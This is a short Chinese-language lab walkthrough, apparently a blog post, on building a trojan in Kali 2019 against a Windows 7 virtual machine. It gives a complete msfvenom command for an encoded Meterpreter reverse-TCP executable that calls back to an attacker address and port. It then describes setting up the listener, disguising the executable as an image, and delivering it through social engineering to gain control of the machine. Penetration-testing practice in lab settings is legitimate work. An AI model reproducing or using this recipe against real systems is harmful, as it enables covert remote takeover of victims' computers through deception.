漏洞復現:使用Kali制作木馬程序
攻擊機:Kali2019
靶機:Win7 64位
攻擊步驟:
1.打開Kali2019和Win7 64位虛擬機,確定IP地址在一個網段
2.確定好IP地址,進入Kali2019進行木馬文件.exe制作,命令如下
命令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=172.16.66.128 LPORT=5555 -f exe >pink.exe
備注:我們選擇的靶機是Win7 64位,所以兼容性一定要設置好,否則會出錯
3.接下來打開msf,編輯遠程模塊,設置payload,具體流程看圖
4.開始設置Payload信息,輸入show options查看,lhost和lport都要設置成exe文件中設置的地址和端口號
5.輸入exploit開始運行監聽模塊,開始監聽
6.把剛剛生成的pink程序通過壓縮合並,制作一個圖片exe文件,通過社工或者其他方法上傳到win7 64位虛擬機中
7.運行這個文件,圖片會打開,Kali2019會收到連接成功的提示
8.成功獲取win7權限,滲透成功